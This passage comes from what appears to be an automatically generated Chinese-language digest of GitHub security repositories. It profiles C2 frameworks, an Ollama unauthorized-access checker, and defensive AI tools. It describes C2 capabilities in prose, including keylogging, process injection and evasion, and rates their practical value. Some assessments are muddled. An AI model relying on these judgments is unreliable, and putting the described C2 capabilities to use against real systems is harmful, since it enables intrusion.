|
|
|||
|
|
> 代码更新的具体安全影响未知
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• C2框架
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
C2框架具有潜在的安全价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### C2test - 基于GitHub的C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [C2test](https://github.com/Kr4z31n/C2test) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个简单的C2框架演示,包含客户端和服务器端脚本。客户端(client.py)定期从GitHub上的一个文本文件(command.txt)中获取命令并在CMD中执行。服务器端(server.py)提供了更新command.txt文件的功能,并通过git push将更新推送到GitHub。本次更新新增了client.py和server.py文件,实现了C2的基本功能。因为直接从GitHub上拉取命令执行,存在命令注入风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架的实现 |
|
|||
|
|
| 2 | 客户端从远程服务器获取命令并执行 |
|
|||
|
|
| 3 | 服务器端更新命令并通过Git提交 |
|
|||
|
|
| 4 | 使用GitHub作为C2通信通道 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> client.py使用requests库从GitHub获取命令,并使用subprocess.run在cmd中执行命令。存在命令注入风险,如果攻击者控制了command.txt文件内容,即可执行任意命令。
|
|||
|
|
|
|||
|
|
> server.py提供更新command.txt文件的功能,并使用git命令将更新推送到GitHub。需要注意git命令执行的安全性。
|
|||
|
|
|
|||
|
|
> 该C2框架使用GitHub作为命令和控制通道,客户端定期轮询GitHub上的command.txt文件获取命令。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 客户端
|
|||
|
|
• 服务器
|
|||
|
|
• cmd
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库实现了一个简单的C2框架,利用GitHub作为命令和控制通道,存在命令注入风险,属于关键的安全更新。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### ReaperC2 - Kubernetes云原生C2框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [ReaperC2](https://github.com/BuildAndDestroy/ReaperC2) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2(Command and Control)框架,旨在运行在Kubernetes和云环境中。目前仅有一个README文件,描述了该框架的基本功能。由于项目处于初始阶段,具体的技术实现和安全机制尚不明确。更新内容仅为项目初始化,添加了README文件。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架 |
|
|||
|
|
| 2 | 基于Kubernetes和云环境 |
|
|||
|
|
| 3 | 与C2关键词高度相关 |
|
|||
|
|
| 4 | 项目处于初始阶段,潜力巨大 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 基于Kubernetes的部署
|
|||
|
|
|
|||
|
|
> 云环境支持
|
|||
|
|
|
|||
|
|
> 目前仅有项目描述,无具体技术细节
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Kubernetes
|
|||
|
|
• Cloud environments
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目与C2关键词高度相关,并且专注于Kubernetes和云环境。虽然目前信息有限,但C2框架在渗透测试和红队行动中具有重要价值。未来如果能提供在Kubernetes上的C2功能,有很大的研究和应用价值,所以判定为有价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### AI-Ollama - Ollama未授权访问漏洞验证脚本
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [AI-Ollama](https://github.com/PstarSec/AI-Ollama) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个Python脚本,用于验证Ollama API未授权访问漏洞(CNVD-2025-04094)。该脚本通过访问`/api/tags`端点,获取AI模型信息来判断漏洞是否存在。更新内容包括完善的使用说明、错误处理及注意事项。项目具备批量扫描、代理、超时设置等功能,方便安全研究人员进行漏洞验证。项目与CNVD关键词高度相关,直接针对已知的漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 验证Ollama API未授权访问漏洞(CNVD-2025-04094) |
|
|||
|
|
| 2 | 提供单URL和批量扫描功能 |
|
|||
|
|
| 3 | 支持代理、超时设置、结果保存 |
|
|||
|
|
| 4 | 与CNVD漏洞披露高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 脚本通过发送HTTP请求到`/api/tags`端点,检查返回的状态码和内容来判断是否存在漏洞。
|
|||
|
|
|
|||
|
|
> 利用requests库发送HTTP请求,tabulate库美化输出。
|
|||
|
|
|
|||
|
|
> 脚本支持单URL和批量扫描,批量扫描时从文件中读取URL。
|
|||
|
|
|
|||
|
|
> 实现了代理、超时设置等功能。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Ollama API
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了针对CNVD-2025-04094漏洞的验证工具,与搜索关键词高度相关。项目代码实现了漏洞的检测和利用,且提供了批量扫描等实用功能,具备一定的研究价值和实用性。项目描述清晰,使用方法明确,代码质量较高。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### paig - GenAI安全防护项目PAIG更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [paig](https://github.com/privacera/paig) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
PAIG项目旨在通过安全、可靠和可观测性来保护生成式AI (GenAI) 应用。本次更新发布了paig-server的0.0.5版本,主要增加了Paig-eval的前后端实现,这可能包括对AI模型的评估和安全性的分析。同时,添加了用于guardrails服务的后端API,这表明该项目可能正在构建安全防护机制,用于检测和阻止潜在的风险行为。此外,UI层面增加了Cypress自动化测试,提高了项目的测试覆盖率和可靠性,并且添加了GET_STARTED.md 文档指导用户部署
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | PAIG是一个旨在保护生成式AI (GenAI) 应用的开源项目 |
|
|||
|
|
| 2 | 更新引入了Paig-eval的前后端实现,以及用于guardrails服务的后端API |
|
|||
|
|
| 3 | 增加了用户和登录操作的UI Cypress自动化测试 |
|
|||
|
|
| 4 | 添加了paig-securechat和paig-server的GET_STARTED.md文档,指导本地部署 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Paig-eval 前后端实现的技术细节尚不明确,可能涉及到AI模型评估、安全漏洞检测等。
|
|||
|
|
|
|||
|
|
> Guardrails后端API可能用于实施访问控制、输入验证、输出过滤等安全策略。
|
|||
|
|
|
|||
|
|
> Cypress自动化测试用于验证用户界面功能,包括用户和登录操作。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• paig-server
|
|||
|
|
• paig-securechat
|
|||
|
|
• GenAI applications
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
本次更新增强了PAIG项目的安全性和功能性,特别是增加了guardrails服务和Paig-eval的前后端实现,这对于保护GenAI应用具有重要意义。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### terno-ai - 改进LLM响应和数据处理
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [terno-ai](https://github.com/terno-ai/terno-ai) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个企业级文本到SQL的对话式分析平台。本次更新主要修复了JSON解析错误,增强了LLM响应处理能力,并改进了数据库schema类型映射,提升数据处理的准确性,新增了csv_llm_response,增强了与LLM交互的功能,优化了文件上传处理逻辑。虽然没有直接的安全漏洞修复,但是对LLM的输入处理和返回值处理的改进,以及数据库类型的修正,提升了系统的整体鲁棒性和数据处理的安全性,减少了潜在的数据注入或其他安全问题。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 修复了JSON解析错误,增强了LLM响应处理能力 |
|
|||
|
|
| 2 | 更新了数据库schema类型映射,提升数据处理的准确性 |
|
|||
|
|
| 3 | 新增了对csv_llm_response的支持,增强了与LLM交互的功能 |
|
|||
|
|
| 4 | 新增了对llm返回值的处理,提升llm返回的数据处理能力 |
|
|||
|
|
| 5 | 修复了文件上传的逻辑错误, 并引入了更清晰的命名规范 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 修改了OpenAILLM的get_response和csv_llm_response函数,改进了JSON解析错误, 提高了容错性。
|
|||
|
|
|
|||
|
|
> 在utils.py中,更新了数据库的类型映射,例如将'INT', 'SMALLINT', 'BIGINT'映射到Integer类型。这改进了数据转换的准确性,降低了潜在的SQL注入风险。
|
|||
|
|
|
|||
|
|
> 修改了views.py的文件上传逻辑,新增了csv_llm_response函数的调用,优化了文件上传的流程,提高了数据处理的效率和正确性。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• terno/terno/llm/openai.py
|
|||
|
|
• terno/terno/utils.py
|
|||
|
|
• terno/terno/views.py
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
虽然本次更新未直接修复安全漏洞,但对JSON解析、数据库类型映射和文件上传处理的改进,增强了系统的安全性和鲁棒性,降低了潜在的数据注入风险。这些改进对整体安全性有积极影响。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### watchtower - AI模型和Notebook安全扫描工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [watchtower](https://github.com/bosch-aisecurity-aishield/watchtower) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具/安全研究` |
|
|||
|
|
| 更新类型 | `功能增强/漏洞修复` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是AIShield Watchtower,一个开源工具,专注于AI模型和Jupyter Notebook的安全扫描与漏洞检测。它能够自动化地发现和扫描AI/ML模型以及notebooks中的安全问题,例如硬编码密钥、PII信息、不安全的库和模型序列化攻击等。Watchtower根据检测到的风险对安全问题进行分类,提供low, medium, high, critical等风险等级,帮助用户进行针对性的安全防护。最近的更新包括处理假阳性,更新漏洞严重性映射和解析,提高了扫描的准确性和效率。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 自动化扫描AI模型和Jupyter Notebook的安全工具 |
|
|||
|
|
| 2 | 能够检测硬编码密钥、PII、过时/不安全库等漏洞 |
|
|||
|
|
| 3 | 提供风险分级,包括low, medium, high, critical |
|
|||
|
|
| 4 | 与AI安全关键词高度相关,直接针对AI模型安全 |
|
|||
|
|
| 5 | 更新包括False Positive处理、漏洞严重性映射和解析 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 采用Python编写,使用CLI和UI界面进行交互
|
|||
|
|
|
|||
|
|
> 扫描内容包括AI/ML模型文件、notebooks、依赖库
|
|||
|
|
|
|||
|
|
> 支持多种模型文件格式,如.h5, .pb, .keras等
|
|||
|
|
|
|||
|
|
> 集成了安全漏洞扫描和风险评估功能
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Jupyter notebooks
|
|||
|
|
• AI/ML Models
|
|||
|
|
• Python packages
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库与AI安全高度相关,直接解决了AI模型和Jupyter Notebook的安全问题。提供了自动化扫描、漏洞检测和风险评估的功能,能够帮助用户提高AI系统的安全性。仓库同时修复了相关的安全问题,提高了工具的实用性。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### AgentAI - Agent AI安全研究工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [AgentAI](https://github.com/zazabap/AgentAI) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `新增仓库` |
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库描述为一个用于安全研究的Agent AI工具。虽然目前仓库信息为空,但根据描述,其核心在于利用Agent AI进行安全研究。由于与AI+Security关键词高度相关,并且明确提及用于安全研究,因此具有潜在的价值。需要进一步分析代码实现,才能确定其具体功能和价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于Agent AI的安全研究工具 |
|
|||
|
|
| 2 | 目标为安全研究和渗透测试 |
|
|||
|
|
| 3 | 与AI+Security关键词高度相关 |
|
|||
|
|
| 4 | 可能包含创新的安全研究方法 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 基于Agent的AI实现,具体技术方案待进一步分析
|
|||
|
|
|
|||
|
|
> 安全机制有待分析
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库与“AI+Security”关键词高度相关,并且明确声明用于安全研究。如果该工具能够提供创新的安全研究方法,则具有较高的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### PrivHunterAI - AI越权漏洞检测工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [PrivHunterAI](https://github.com/Ed1s0nZ/PrivHunterAI) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能/安全研究` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个利用AI引擎检测越权漏洞的工具。此次更新主要集中在Prompt优化、结构相似度计算改进、重试机制增强以及成本优化。具体来说,更新后的Prompt旨在降低误报率;结构相似度计算在计算时忽略动态字段,如时间戳等;重试机制则在API调用失败时提供更友好的提示并限制重试次数;新增的鉴权关键字过滤功能则能在无需调用AI的情况下快速判断,从而节省了成本。
|
|||
|
|
|
|||
|
|
此次更新提高了工具的准确性和效率,改进了漏洞检测的流程。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于AI检测越权漏洞的工具 |
|
|||
|
|
| 2 | 更新优化了Prompt,降低误报率 |
|
|||
|
|
| 3 | 更新增加了忽略动态字段的结构相似度计算 |
|
|||
|
|
| 4 | 优化了重试机制 |
|
|||
|
|
| 5 | 新增鉴权关键字过滤,节省AI成本 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Prompt优化:修改了用于提示AI进行越权检测的指令,可能包括调整关键词、逻辑结构等,以降低误报率。
|
|||
|
|
|
|||
|
|
> 结构相似度计算:在计算responseA和responseB的结构相似度时,增加了忽略动态字段的逻辑,从而提高了判断的准确性。
|
|||
|
|
|
|||
|
|
> 重试机制:优化了API调用失败后的重试机制,提供了更友好的错误提示,并限制了重试次数,避免了无限重试的情况。
|
|||
|
|
|
|||
|
|
> 鉴权关键字过滤:新增了在调用AI判断越权前,通过鉴权关键字(如“暂无查询权限”等)进行快速过滤的功能,减少了AI tokens的消耗,提升了资源利用效率。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• AI引擎
|
|||
|
|
• API接口
|
|||
|
|
• HTTP请求
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
更新涉及到了Prompt优化、结构相似度计算的改进以及重试机制的增强。这些改进有助于提升检测的准确性和效率,并降低了误报率,使得该工具更实用。此外,通过优化成本控制,使得工具能够更有效地利用资源,从而增强了其价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### NXP-MCUBootUtility - NXP MCU安全启动工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [NXP-MCUBootUtility](https://github.com/JayHeng/NXP-MCUBootUtility) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `功能更新` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **74**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是NXP MCU的安全启动工具,提供图形化界面,简化了NXP MCU安全启动的流程。它支持UART和USB-HID下载模式,支持多种镜像文件格式,包括elf/axf/srec/hex/bin。该工具可以验证镜像的范围和适用性,支持将裸镜像转换为可启动镜像,并加载到外部启动设备,支持常见的启动设备存储操作。本次更新是v6.4.0版本,主要增加了对i.MXRT700 B0的支持,并改进了启动设备内存窗口的字符对齐。此外,还新增了启动日志功能。由于该仓库是用于安全启动的工具,与安全息息相关,故具有一定价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | NXP MCU安全启动一站式工具 |
|
|||
|
|
| 2 | 支持多种NXP MCU芯片及启动方式 |
|
|||
|
|
| 3 | 提供图形化用户界面操作 |
|
|||
|
|
| 4 | 支持BootROM日志解析功能 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 支持UART和USB-HID下载
|
|||
|
|
|
|||
|
|
> 支持多种镜像格式转换
|
|||
|
|
|
|||
|
|
> 提供图形界面操作
|
|||
|
|
|
|||
|
|
> 支持FlexSPI NOR/NAND等启动设备
|
|||
|
|
|
|||
|
|
> 支持ROM boot log解析
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• NXP MCU
|
|||
|
|
• BootROM
|
|||
|
|
• FlexSPI NOR
|
|||
|
|
• FlexSPI NAND
|
|||
|
|
• SEMC NAND
|
|||
|
|
• SEMC NOR
|
|||
|
|
• uSDHC SD/eMMC
|
|||
|
|
• LPSPI NOR/EEPROM
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库是NXP MCU的安全启动工具,与安全启动相关,同时提供了图形化界面,方便用户进行操作,且更新内容包括新增启动日志解析,因此具有一定的安全价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Hydrangea-C2-Payloads - 跨平台C2框架,渗透测试工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Hydrangea-C2-Payloads](https://github.com/captain-woof/Hydrangea-C2-Payloads) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `功能更新` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **4**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个跨平台的C2框架,名为Hydrangea。它支持Windows和Linux平台,并提供了红队攻击所需的功能,包括进程控制、文件操作、注册表操作、服务管理、键盘记录等。此次更新在README文件中增加了对C2客户端命令的详细说明,并增加了CAT和MKDIR命令。该C2框架设计注重规避检测和反分析,具备一定的隐蔽性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 跨平台C2框架,支持Windows和Linux |
|
|||
|
|
| 2 | 包含多种C2功能,如文件系统操作,进程控制,服务管理,注册表操作等 |
|
|||
|
|
| 3 | 具有规避检测和反分析的功能 |
|
|||
|
|
| 4 | 与C2关键词高度相关,项目核心是C2框架 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> C2框架采用Agent-Listener的架构进行通信。
|
|||
|
|
|
|||
|
|
> Agent和Listener之间使用自定义的通信协议,消息以null字节分隔。
|
|||
|
|
|
|||
|
|
> Agent支持多种功能,通过客户端发送命令进行控制,命令格式为null分隔的字符串。
|
|||
|
|
|
|||
|
|
> C2客户端支持powershell脚本,通过cmake进行编译
|
|||
|
|
|
|||
|
|
> 实现了跨平台编译,可以在Linux上生成Windows DLL
|
|||
|
|
|
|||
|
|
> 具备进程注入、shellcode加载等高级功能
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Windows
|
|||
|
|
• Linux
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库是一个功能完善的C2框架,与关键词'c2'高度相关,提供了渗透测试中常用的功能,并且具有跨平台和隐蔽性优势,技术含量高,具备较高的研究和使用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### DB-GPT - DB-GPT: AI原生数据应用框架更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [DB-GPT](https://github.com/eosphoros-ai/DB-GPT) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **32**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个AI原生数据应用开发框架,本次更新主要集中在以下几个方面:
|
|||
|
|
|
|||
|
|
1. **AI推理输出支持**:添加了对AI推理的支持,改进了模型输出的结果,允许模型返回思维链,方便用户理解。
|
|||
|
|
2. **流式输出优化**:改进了流式输出的逻辑,提升了用户体验。
|
|||
|
|
3. **API和客户端修复**:修复了API和客户端的多个问题,提高了稳定性和可用性。
|
|||
|
|
4. **数据库QA支持**:引入了新API用于支持数据库QA。
|
|||
|
|
5. **依赖库更新**:更新了依赖库,可能包含安全修复或性能优化。
|
|||
|
|
|
|||
|
|
本次更新,引入了返回模型思维链的功能,这在一定程度上增强了模型的解释性。此外,对客户端的流式输出进行了优化,提高了用户体验。API的修复和依赖库的更新也增加了系统的稳定性和安全性。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 支持AI推理输出,改进了模型输出的结果,支持返回思维链 |
|
|||
|
|
| 2 | 优化了流式输出的逻辑,提升了用户体验 |
|
|||
|
|
| 3 | 修复了API和客户端的多个问题,提高了稳定性和可用性 |
|
|||
|
|
| 4 | 引入了新API用于支持数据库QA |
|
|||
|
|
| 5 | 更新了依赖库,可能包含安全修复 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 在`dbgpt-core`中`ModelOutput`类增加了对思维链的支持,并修改了`build`方法,以支持返回`thinking`字段。
|
|||
|
|
|
|||
|
|
> 在`dbgpt-client`中,增加了对返回思维链的支持,修改了客户端的流式输出逻辑,从`out.text`改为`out.gen_text_with_thinking()`。
|
|||
|
|
|
|||
|
|
